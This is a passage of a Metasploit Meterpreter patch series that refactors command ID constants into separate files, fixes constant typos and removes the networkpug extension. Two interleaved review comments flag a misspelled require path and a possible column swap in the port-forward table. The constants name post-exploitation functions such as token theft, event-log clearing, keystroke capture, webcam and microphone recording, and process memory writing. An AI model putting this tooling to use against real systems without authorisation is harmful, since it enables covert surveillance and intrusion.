-COMMAND_ID_STDAPI_SYS_CONFIG_GETENV = EXTENSION_ID_STDAPI + 52 -COMMAND_ID_STDAPI_SYS_CONFIG_GETPRIVS = EXTENSION_ID_STDAPI + 53 -COMMAND_ID_STDAPI_SYS_CONFIG_GETSID = EXTENSION_ID_STDAPI + 54 -COMMAND_ID_STDAPI_SYS_CONFIG_GETUID = EXTENSION_ID_STDAPI + 55 -COMMAND_ID_STDAPI_SYS_CONFIG_LOCALTIME = EXTENSION_ID_STDAPI + 56 -COMMAND_ID_STDAPI_SYS_CONFIG_REV2SELF = EXTENSION_ID_STDAPI + 57 -COMMAND_ID_STDAPI_SYS_CONFIG_STEAL_TOKEN = EXTENSION_ID_STDAPI + 58 -COMMAND_ID_STDAPI_SYS_CONFIG_SYSINFO = EXTENSION_ID_STDAPI + 59 
-COMMAND_ID_STDAPI_SYS_EVENTLOG_CLEAR = EXTENSION_ID_STDAPI + 60 -COMMAND_ID_STDAPI_SYS_EVENTLOG_CLOSE = EXTENSION_ID_STDAPI + 61 -COMMAND_ID_STDAPI_SYS_EVENTLOG_NUMRECORDS = EXTENSION_ID_STDAPI + 62 -COMMAND_ID_STDAPI_SYS_EVENTLOG_OLDEST = EXTENSION_ID_STDAPI + 63 -COMMAND_ID_STDAPI_SYS_EVENTLOG_OPEN = EXTENSION_ID_STDAPI + 64 -COMMAND_ID_STDAPI_SYS_EVENTLOG_READ = EXTENSION_ID_STDAPI + 65 -COMMAND_ID_STDAPI_SYS_POWER_EXITWINDOWS = EXTENSION_ID_STDAPI + 66 -COMMAND_ID_STDAPI_SYS_PROCESS_ATTACH = EXTENSION_ID_STDAPI + 67 -COMMAND_ID_STDAPI_SYS_PROCESS_CLOSE = EXTENSION_ID_STDAPI + 68 -COMMAND_ID_STDAPI_SYS_PROCESS_EXECUTE = EXTENSION_ID_STDAPI + 69 -COMMAND_ID_STDAPI_SYS_PROCESS_GET_INFO = EXTENSION_ID_STDAPI + 70 -COMMAND_ID_STDAPI_SYS_PROCESS_GET_PROCESSES = EXTENSION_ID_STDAPI + 71 -COMMAND_ID_STDAPI_SYS_PROCESS_GETPID = EXTENSION_ID_STDAPI + 72 -COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_GET_IMAGES = EXTENSION_ID_STDAPI + 73 -COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_GET_PROC_ADDRESS = EXTENSION_ID_STDAPI + 74 -COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_LOAD = EXTENSION_ID_STDAPI + 75 -COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_UNLOAD = EXTENSION_ID_STDAPI + 76 -COMMAND_ID_STDAPI_SYS_PROCESS_KILL = EXTENSION_ID_STDAPI + 77 -COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_ALLOCATE = EXTENSION_ID_STDAPI + 78 -COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_FREE = EXTENSION_ID_STDAPI + 79 -COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_LOCK = EXTENSION_ID_STDAPI + 80 -COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_PROTECT = EXTENSION_ID_STDAPI + 81 -COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_QUERY = EXTENSION_ID_STDAPI + 82 -COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_READ = EXTENSION_ID_STDAPI + 83 -COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_UNLOCK = EXTENSION_ID_STDAPI + 84 -COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_WRITE = EXTENSION_ID_STDAPI + 85 -COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_CLOSE = EXTENSION_ID_STDAPI + 86 -COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_CREATE = EXTENSION_ID_STDAPI + 87 -COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_GET_THREADS = 
EXTENSION_ID_STDAPI + 88 -COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_OPEN = EXTENSION_ID_STDAPI + 89 -COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_QUERY_REGS = EXTENSION_ID_STDAPI + 90 -COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_RESUME = EXTENSION_ID_STDAPI + 91 -COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_SET_REGS = EXTENSION_ID_STDAPI + 92 -COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_SUSPEND = EXTENSION_ID_STDAPI + 93 -COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_TERMINATE = EXTENSION_ID_STDAPI + 94 -COMMAND_ID_STDAPI_SYS_PROCESS_WAIT = EXTENSION_ID_STDAPI + 95 -COMMAND_ID_STDAPI_UI_DESKTOP_ENUM = EXTENSION_ID_STDAPI + 96 -COMMAND_ID_STDAPI_UI_DESKTOP_GET = EXTENSION_ID_STDAPI + 97 -COMMAND_ID_STDAPI_UI_DESKTOP_SCREENSHOT = EXTENSION_ID_STDAPI + 98 -COMMAND_ID_STDAPI_UI_DESKTOP_SET = EXTENSION_ID_STDAPI + 99 -COMMAND_ID_STDAPI_UI_ENABLE_KEYBOARD = EXTENSION_ID_STDAPI + 100 -COMMAND_ID_STDAPI_UI_ENABLE_MOUSE = EXTENSION_ID_STDAPI + 101 -COMMAND_ID_STDAPI_UI_GET_IDLE_TIME = EXTENSION_ID_STDAPI + 102 -COMMAND_ID_STDAPI_UI_GET_KEYS_UTF8 = EXTENSION_ID_STDAPI + 103 -COMMAND_ID_STDAPI_UI_SEND_KEYEVENT = EXTENSION_ID_STDAPI + 104 -COMMAND_ID_STDAPI_UI_SEND_KEYS = EXTENSION_ID_STDAPI + 105 -COMMAND_ID_STDAPI_UI_SEND_MOUSE = EXTENSION_ID_STDAPI + 106 -COMMAND_ID_STDAPI_UI_START_KEYSCAN = EXTENSION_ID_STDAPI + 107 -COMMAND_ID_STDAPI_UI_STOP_KEYSCAN = EXTENSION_ID_STDAPI + 108 -COMMAND_ID_STDAPI_UI_UNLOCK_DESKTOP = EXTENSION_ID_STDAPI + 109 -COMMAND_ID_STDAPI_WEBCAM_AUDIO_RECORD = EXTENSION_ID_STDAPI + 110 -COMMAND_ID_STDAPI_WEBCAM_GET_FRAME = EXTENSION_ID_STDAPI + 111 -COMMAND_ID_STDAPI_WEBCAM_LIST = EXTENSION_ID_STDAPI + 112 -COMMAND_ID_STDAPI_WEBCAM_START = EXTENSION_ID_STDAPI + 113 -COMMAND_ID_STDAPI_WEBCAM_STOP = EXTENSION_ID_STDAPI + 114 -COMMAND_ID_STDAPI_AUDIO_MIC_START = EXTENSION_ID_STDAPI + 115 -COMMAND_ID_STDAPI_AUDIO_MIC_STOP = EXTENSION_ID_STDAPI + 116 -COMMAND_ID_STDAPI_AUDIO_MIC_LIST = EXTENSION_ID_STDAPI + 117 - - - ## # # General 
diff --git a/lib/rex/post/meterpreter/extensions/unhook/command_ids.rb b/lib/rex/post/meterpreter/extensions/unhook/command_ids.rb new file mode 100644 index 0000000000000..829cc74ec4936 --- /dev/null +++ b/lib/rex/post/meterpreter/extensions/unhook/command_ids.rb @@ -0,0 +1,18 @@ +# -*- coding: binary -*- +module Rex +module Post +module Meterpreter +module Extensions +module Unhook + +# ID for the extension (needs to be a multiple of 1000) +EXTENSION_ID_UNHOOK = 10000 + +# Associated command ids +COMMAND_ID_UNHOOK_PE = EXTENSION_ID_UNHOOK + 1 + +end +end +end +end +end diff --git a/lib/rex/post/meterpreter/extensions/unhook/tlv.rb b/lib/rex/post/meterpreter/extensions/unhook/tlv.rb index 13fb1ddf0c17c..179f69b3f2a4b 100644 --- a/lib/rex/post/meterpreter/extensions/unhook/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/unhook/tlv.rb @@ -5,12 +5,6 @@ module Meterpreter module Extensions module Unhook -# ID for the extension (needs to be a multiple of 1000) -EXTENSION_ID_UNHOOK = 10000 - -# Associated command ids -COMMAND_ID_UNHOOK_PE = EXTENSION_ID_UNHOOK + 1 - TLV_TYPE_UNHOOK_ERROR_CODE = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 1) end diff --git a/lib/rex/post/meterpreter/extensions/unhook/unhook.rb b/lib/rex/post/meterpreter/extensions/unhook/unhook.rb index 7426a1a93cf8d..5d03815552d5d 100644 --- a/lib/rex/post/meterpreter/extensions/unhook/unhook.rb +++ b/lib/rex/post/meterpreter/extensions/unhook/unhook.rb @@ -1,6 +1,7 @@ # -*- coding: binary -*- require 'rex/post/meterpreter/extensions/unhook/tlv' +require 'rex/post/meterpreter/extensions/unhook/command_ids' module Rex module Post @@ -18,7 +19,7 @@ class Unhook < Extension UNHOOK_ERROR_SUCCESS = 0 def self.extension_id - EXTENSION_ID_UNOOK + EXTENSION_ID_UNHOOK end def initialize(client) diff --git a/lib/rex/post/meterpreter/extensions/winpmem/command_ids.rb b/lib/rex/post/meterpreter/extensions/winpmem/command_ids.rb new file mode 100644 index 0000000000000..58b0f1170235a --- /dev/null 
+++ b/lib/rex/post/meterpreter/extensions/winpmem/command_ids.rb @@ -0,0 +1,18 @@ +# -*- coding: binary -*- +module Rex +module Post +module Meterpreter +module Extensions +module Winpmem + +# ID for the extension (needs to be a multiple of 1000) +EXTENSION_ID_WINPMEM = 7000 + +# Associated command ids +COMMAND_ID_WINPMEM_DUMP_RAM = EXTENSION_ID_WINPMEM + 1 + +end +end +end +end +end diff --git a/lib/rex/post/meterpreter/extensions/winpmem/tlv.rb b/lib/rex/post/meterpreter/extensions/winpmem/tlv.rb index 099ec10c823e3..236b7f41e50e1 100644 --- a/lib/rex/post/meterpreter/extensions/winpmem/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/winpmem/tlv.rb @@ -5,12 +5,6 @@ module Meterpreter module Extensions module Winpmem -# ID for the extension (needs to be a multiple of 1000) -EXTENSION_ID_WINPMEM = 7000 - -# Associated command ids -COMMAND_ID_WINPMEM_DUMP_RAM = EXTENSION_ID_WINPMEM + 1 - TLV_TYPE_WINPMEM_ERROR_CODE = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 1) TLV_TYPE_WINPMEM_MEMORY_SIZE = TLV_META_TYPE_QWORD | (TLV_EXTENSIONS + 2) diff --git a/lib/rex/post/meterpreter/extensions/winpmem/winpmem.rb b/lib/rex/post/meterpreter/extensions/winpmem/winpmem.rb index 1e467a9c37ff1..95eee648d1bb3 100644 --- a/lib/rex/post/meterpreter/extensions/winpmem/winpmem.rb +++ b/lib/rex/post/meterpreter/extensions/winpmem/winpmem.rb @@ -1,6 +1,7 @@ # -*- coding: binary -*- require 'rex/post/meterpreter/extensions/winpmem/tlv' +require 'rex/post/meterpreter/extensions/winpmem/command_ids' module Rex module Post diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb index 3b2c020b0d5bd..5a55b076ef228 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb 
@@ -1,5 +1,6 @@ # -*- coding: binary -*- require 'rex/post/meterpreter' +require 'rex/post/meterpreter/exensions/android/command_ids' require 'msf/core/auxiliary/report' require 'rex/google/geolocation' require 'date' @@ -13,8 +14,10 @@ module Ui # extension by Anwar Mohamed (@anwarelmakrahy) ### class Console::CommandDispatcher::Android + include Console::CommandDispatcher include Msf::Auxiliary::Report + include Rex::Post::Meterpreter::Extensions::Android # # List of supported commands. diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/appapi.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/appapi.rb index e9dcd629a59ec..d90df630f83da 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/appapi.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/appapi.rb @@ -1,5 +1,6 @@ # -*- coding: binary -*- require 'rex/post/meterpreter' +require 'rex/post/meterpreter/extensions/appapi/command_ids' module Rex module Post @@ -13,7 +14,9 @@ module Ui # ### class Console::CommandDispatcher::AppApi + include Console::CommandDispatcher + include Rex::Post::Meterpreter::Extensions::AppApi # # List of supported commands. diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/adsi.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/adsi.rb index d5a033673c663..156d630873b53 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/adsi.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/adsi.rb @@ -1,5 +1,6 @@ # -*- coding: binary -*- require 'rex/post/meterpreter' +require 'rex/post/meterpreter/extensions/extapi/command_ids' module Rex module Post @@ -16,6 +17,7 @@ class Console::CommandDispatcher::Extapi::Adsi Klass = Console::CommandDispatcher::Extapi::Adsi include Console::CommandDispatcher + include Rex::Post::Meterpreter::Extensions::Extapi # Zero indicates "no limit" DEFAULT_MAX_RESULTS = 0 
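Review bot: The added require in android.rb misspells the directory as `exensions`, so `require 'rex/post/meterpreter/exensions/android/command_ids'` raises LoadError as soon as this dispatcher is loaded; every other dispatcher touched in this series uses `extensions`. It should read `require 'rex/post/meterpreter/extensions/android/command_ids'`. The `include Rex::Post::Meterpreter::Extensions::Android` added in the next hunk relies on that file having been loaded, so the typo breaks the whole Android console dispatcher rather than just one command.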
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/clipboard.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/clipboard.rb index 0c6bb159b83fb..320f7a3ea1070 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/clipboard.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/clipboard.rb @@ -1,5 +1,6 @@ # -*- coding: binary -*- require 'rex/post/meterpreter' +require 'rex/post/meterpreter/extensions/extapi/command_ids' module Rex module Post @@ -15,6 +16,7 @@ class Console::CommandDispatcher::Extapi::Clipboard Klass = Console::CommandDispatcher::Extapi::Clipboard include Console::CommandDispatcher + include Rex::Post::Meterpreter::Extensions::Extapi # # List of supported commands. diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/service.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/service.rb index ba5c600024b53..7ae9a4b91f84d 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/service.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/service.rb @@ -1,5 +1,6 @@ # -*- coding: binary -*- require 'rex/post/meterpreter' +require 'rex/post/meterpreter/extensions/extapi/command_ids' module Rex module Post @@ -16,6 +17,7 @@ class Console::CommandDispatcher::Extapi::Service Klass = Console::CommandDispatcher::Extapi::Service include Console::CommandDispatcher + include Rex::Post::Meterpreter::Extensions::Extapi # # List of supported commands. diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/window.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/window.rb index 1dfab3938d441..ba8913ab299b8 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/window.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/window.rb 
@@ -1,6 +1,7 @@ # -*- coding: binary -*- require 'rex/post/meterpreter' +require 'rex/post/meterpreter/extensions/extapi/command_ids' module Rex module Post @@ -17,6 +18,7 @@ class Console::CommandDispatcher::Extapi::Window Klass = Console::CommandDispatcher::Extapi::Window include Console::CommandDispatcher + include Rex::Post::Meterpreter::Extensions::Extapi # # List of supported commands. diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/wmi.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/wmi.rb index f7159672a406f..b1e53e210ffbd 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/wmi.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/wmi.rb @@ -1,5 +1,6 @@ # -*- coding: binary -*- require 'rex/post/meterpreter' +require 'rex/post/meterpreter/extensions/extapi/command_ids' module Rex module Post @@ -16,6 +17,7 @@ class Console::CommandDispatcher::Extapi::Wmi Klass = Console::CommandDispatcher::Extapi::Wmi include Console::CommandDispatcher + include Rex::Post::Meterpreter::Extensions::Extapi # Zero indicates "no limit" DEFAULT_MAX_RESULTS = 0 diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/lanattacks/dhcp.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/lanattacks/dhcp.rb index f0ccb91efb95e..3577ff4e7873d 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/lanattacks/dhcp.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/lanattacks/dhcp.rb @@ -1,5 +1,6 @@ # -*- coding: binary -*- require 'rex/post/meterpreter' +require 'rex/post/meterpreter/extensions/lanattacks/command_ids' module Rex module Post @@ -16,6 +17,7 @@ class Console::CommandDispatcher::Lanattacks::Dhcp Klass = Console::CommandDispatcher::Lanattacks::Dhcp include Console::CommandDispatcher + include Rex::Post::Meterpreter::Extensions::Lanattacks # # List of supported commands. 
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/lanattacks/tftp.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/lanattacks/tftp.rb index 5c18d05956ec5..9b38278f0319b 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/lanattacks/tftp.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/lanattacks/tftp.rb @@ -1,5 +1,6 @@ # -*- coding: binary -*- require 'rex/post/meterpreter' +require 'rex/post/meterpreter/extensions/lanattacks/command_ids' module Rex module Post @@ -16,6 +17,7 @@ class Console::CommandDispatcher::Lanattacks::Tftp Klass = Console::CommandDispatcher::Lanattacks::Tftp include Console::CommandDispatcher + include Rex::Post::Meterpreter::Extensions::Lanattacks # # List of supported commands. diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb index 5c71863f33a9a..a8d1a44898755 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb @@ -1,5 +1,6 @@ # -*- coding: binary -*- require 'rex/post/meterpreter' +require 'rex/post/meterpreter/extensions/sniffer/command_ids' module Rex module Post @@ -16,6 +17,7 @@ class Console::CommandDispatcher::Sniffer Klass = Console::CommandDispatcher::Sniffer include Console::CommandDispatcher + include Rex::Post::Meterpreter::Extensions::Sniffer # # Initializes an instance of the sniffer command interaction. 
@@ -28,27 +30,25 @@ def initialize(shell) # List of supported commands. # def commands - #all = { - { + all = { 'sniffer_interfaces' => 'Enumerate all sniffable network interfaces', - 'sniffer_start' => 'Start packet capture on a specific interface', - 'sniffer_stop' => 'Stop packet capture on a specific interface', - 'sniffer_stats' => 'View statistics of an active capture', - 'sniffer_dump' => 'Retrieve captured packet data to PCAP file', - 'sniffer_release' => 'Free captured packets on a specific interface instead of downloading them' + 'sniffer_start' => 'Start packet capture on a specific interface', + 'sniffer_stop' => 'Stop packet capture on a specific interface', + 'sniffer_stats' => 'View statistics of an active capture', + 'sniffer_dump' => 'Retrieve captured packet data to PCAP file', + 'sniffer_release' => 'Free captured packets on a specific interface instead of downloading them', } - # TODO: Determine why these are commented out - #reqs = { - # 'sniffer_interfaces' => [COMMAND_ID_NIFFER_INTERFACES], - # 'sniffer_start' => [COMMAND_ID_NIFFER_CAPTURE_START], - # 'sniffer_stop' => [COMMAND_ID_NIFFER_CAPTURE_STOP], - # 'sniffer_stats' => [COMMAND_ID_NIFFER_CAPTURE_STATS], - # 'sniffer_dump' => [COMMAND_ID_NIFFER_CAPTURE_DUMP], - # 'sniffer_release' => [COMMAND_ID_NIFFER_CAPTURE_RELEASE] - #} - - #filter_commands(all, reqs) + reqs = { + 'sniffer_interfaces' => [COMMAND_ID_SNIFFER_INTERFACES], + 'sniffer_start' => [COMMAND_ID_SNIFFER_CAPTURE_START], + 'sniffer_stop' => [COMMAND_ID_SNIFFER_CAPTURE_STOP], + 'sniffer_stats' => [COMMAND_ID_SNIFFER_CAPTURE_STATS], + 'sniffer_dump' => [COMMAND_ID_SNIFFER_CAPTURE_DUMP], + 'sniffer_release' => [COMMAND_ID_SNIFFER_CAPTURE_RELEASE], + } + + filter_commands(all, reqs) end diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb index ed744476f8e2d..55c1b6d277731 100644 
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb @@ -2,6 +2,7 @@ require 'tempfile' require 'filesize' require 'rex/post/meterpreter' +require 'rex/post/meterpreter/extensions/stdapi/command_ids' module Rex module Post @@ -18,6 +19,7 @@ class Console::CommandDispatcher::Stdapi::Fs Klass = Console::CommandDispatcher::Stdapi::Fs include Console::CommandDispatcher + include Rex::Post::Meterpreter::Extensions::Stdapi CHECKSUM_ALGORITHMS = %w{ md5 sha1 } private_constant :CHECKSUM_ALGORITHMS @@ -100,7 +102,7 @@ def commands 'cat' => [], 'cd' => [COMMAND_ID_STDAPI_FS_CHDIR], 'checksum' => [COMMAND_ID_STDAPI_FS_MD5, COMMAND_ID_STDAPI_FS_SHA1], - 'del' => [COMMAND_ID_STDAPI_FS_RM], + 'del' => [COMMAND_ID_STDAPI_FS_DELETE_FILE], 'dir' => [COMMAND_ID_STDAPI_FS_STAT, COMMAND_ID_STDAPI_FS_LS], 'download' => [], 'edit' => [], diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/mic.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/mic.rb index 14f5141ad0232..23e8189eb3d5e 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/mic.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/mic.rb @@ -1,5 +1,6 @@ # -*- coding: binary -*- require 'rex/post/meterpreter' +require 'rex/post/meterpreter/extensions/stdapi/command_ids' require 'bindata' module Rex @@ -16,6 +17,7 @@ class Console::CommandDispatcher::Stdapi::Mic Klass = Console::CommandDispatcher::Stdapi::Mic include Console::CommandDispatcher + include Rex::Post::Meterpreter::Extensions::Stdapi # # List of supported commands. diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb index dc07701c9cda4..8ba877e4f06a2 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb 
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb @@ -1,5 +1,6 @@ # -*- coding: binary -*- require 'rex/post/meterpreter' +require 'rex/post/meterpreter/extensions/stdapi/command_ids' require 'rex/service_manager' module Rex @@ -17,6 +18,7 @@ class Console::CommandDispatcher::Stdapi::Net Klass = Console::CommandDispatcher::Stdapi::Net include Console::CommandDispatcher + include Rex::Post::Meterpreter::Extensions::Stdapi # # This module is used to extend the meterpreter session @@ -426,11 +428,7 @@ def cmd_portfwd(*args) direction = 'Forward' direction = 'Reverse' if opts['Reverse'] == true - if opts['Reverse'] == true - table << [cnt + 1, "#{rhost}:#{rport}", "#{lhost}:#{lport}", 'Reverse'] - else - table << [cnt + 1, "#{lhost}:#{lport}", "#{rhost}:#{rport}", 'Forward'] - end + table << [cnt + 1, "#{rhost}:#{rport}", "#{lhost}:#{lport}", direction] cnt += 1 } diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb index 4d609a7b743ea..bf67ab34a47f8 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb @@ -1,5 +1,6 @@ # -*- coding: binary -*- require 'rex/post/meterpreter' +require 'rex/post/meterpreter/extensions/stdapi/command_ids' module Rex module Post @@ -16,6 +17,7 @@ class Console::CommandDispatcher::Stdapi::Sys Klass = Console::CommandDispatcher::Stdapi::Sys include Console::CommandDispatcher + include Rex::Post::Meterpreter::Extensions::Stdapi # # Options used by the 'execute' command. @@ -1103,7 +1105,6 @@ def cmd_getprivs(*args) 'Columns' => ['Name'] ) - privs = client.sys.config.getprivs client.sys.config.getprivs.each do |priv| table << [priv] end 
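Review bot: The single row appended in cmd_portfwd always puts `rhost:rport` before `lhost:lport`, whereas the replaced branches put the local endpoint first for forward entries and the remote endpoint first for reverse entries, so forward rows now have their two address columns swapped relative to the previous output. If the table header (defined outside the hunk) labels those columns as local/remote, the direction-dependent ordering should be kept while still collapsing the duplication, e.g. `local, remote = "#{lhost}:#{lport}", "#{rhost}:#{rport}"` followed by `table << (opts['Reverse'] == true ? [cnt + 1, remote, local, direction] : [cnt + 1, local, remote, direction])`; if the header was deliberately made direction-neutral, a short comment above the row saying so would stop the next reader from treating it as a regression. cmd_portfwd starts and ends outside the hunk.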
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb index dfa36bff96a31..d274c6c598f74 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb @@ -1,5 +1,6 @@ # -*- coding: binary -*- require 'rex/post/meterpreter' +require 'rex/post/meterpreter/extensions/stdapi/command_ids' module Rex module Post @@ -17,6 +18,7 @@ class Console::CommandDispatcher::Stdapi::Ui include Console::CommandDispatcher include Console::CommandDispatcher::Stdapi::Stream + include Rex::Post::Meterpreter::Extensions::Stdapi # # List of supported commands. @@ -393,15 +395,15 @@ def cmd_keyscan_start(*args) keyscan_opts.parse(args) { | opt | case opt - when "-h" + when "-h" print_line("Usage: keyscan_start ") print_line("Starts the key logger") print_line(keyscan_opts.usage) return - when "-v" + when "-v" print_line("Verbose logging selected ...") trackwin = true - end + end } print_line("Starting the keystroke sniffer ...") diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb index d897ceb75fad5..aa9fce3fb1f32 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb @@ -1,5 +1,6 @@ # -*- coding: binary -*- require 'rex/post/meterpreter' +require 'rex/post/meterpreter/extensions/stdapi/command_ids' module Rex module Post @@ -16,6 +17,7 @@ class Console::CommandDispatcher::Stdapi::Webcam include Console::CommandDispatcher include Console::CommandDispatcher::Stdapi::Stream + include Rex::Post::Meterpreter::Extensions::Stdapi # # List of supported commands. From 1fd771c092852ff1d97bc4a272734f6c32015da1 Mon Sep 17 00:00:00 2001 
From: OJ Date: Tue, 5 May 2020 09:15:44 +1000 Subject: [PATCH 06/20] Remove networkpug This thing doesn't exist any more, so no need to have code referencing it. --- .../extensions/networkpug/command_ids.rb | 19 -- .../extensions/networkpug/networkpug.rb | 63 ----- .../meterpreter/extensions/networkpug/tlv.rb | 16 -- .../console/command_dispatcher/networkpug.rb | 232 ------------------ 4 files changed, 330 deletions(-) delete mode 100644 lib/rex/post/meterpreter/extensions/networkpug/command_ids.rb delete mode 100644 lib/rex/post/meterpreter/extensions/networkpug/networkpug.rb delete mode 100644 lib/rex/post/meterpreter/extensions/networkpug/tlv.rb delete mode 100644 lib/rex/post/meterpreter/ui/console/command_dispatcher/networkpug.rb diff --git a/lib/rex/post/meterpreter/extensions/networkpug/command_ids.rb b/lib/rex/post/meterpreter/extensions/networkpug/command_ids.rb deleted file mode 100644 index 569fe9a31d85d..0000000000000 --- a/lib/rex/post/meterpreter/extensions/networkpug/command_ids.rb +++ /dev/null @@ -1,19 +0,0 @@ -# -*- coding: binary -*- -module Rex -module Post -module Meterpreter -module Extensions -module NetworkPug - -# ID for the extension (needs to be a multiple of 1000) -EXTENSION_ID_NETWORKPUG = 6000 - -# Associated command ids -COMMAND_ID_NETWORKPUG_START = EXTENSION_ID_NETWORKPUG + 1 -COMMAND_ID_NETWORKPUG_STOP = EXTENSION_ID_NETWORKPUG + 2 - -end -end -end -end -end diff --git a/lib/rex/post/meterpreter/extensions/networkpug/networkpug.rb b/lib/rex/post/meterpreter/extensions/networkpug/networkpug.rb deleted file mode 100644 index d5810df46f896..0000000000000 --- a/lib/rex/post/meterpreter/extensions/networkpug/networkpug.rb +++ /dev/null 
@@ -1,63 +0,0 @@ -# -*- coding: binary -*- - -require 'rex/post/meterpreter/extensions/networkpug/tlv' -require 'rex/post/meterpreter/extensions/networkpug/command_ids' - -module Rex -module Post -module Meterpreter -module Extensions -module NetworkPug - -# NetworkPug implements a remote packet recieve/send on a network interface -# on the remote machine - -class NetworkPug < Extension - - def self.extension_id - EXTENSION_ID_NETWORKPUG - end - - def initialize(client) - super(client, 'networkpug') - - client.register_extension_aliases( - [ - { - 'name' => 'networkpug', - 'ext' => self - }, - ]) - end - - def networkpug_start(interface, filter) - request = Packet.create_request(COMMAND_ID_NETWORKPUG_START) - request.add_tlv(TLV_TYPE_NETWORKPUG_INTERFACE, interface) - request.add_tlv(TLV_TYPE_NETWORKPUG_FILTER, filter) if(filter and filter != "") - response = client.send_request(request) - - channel = nil - channel_id = 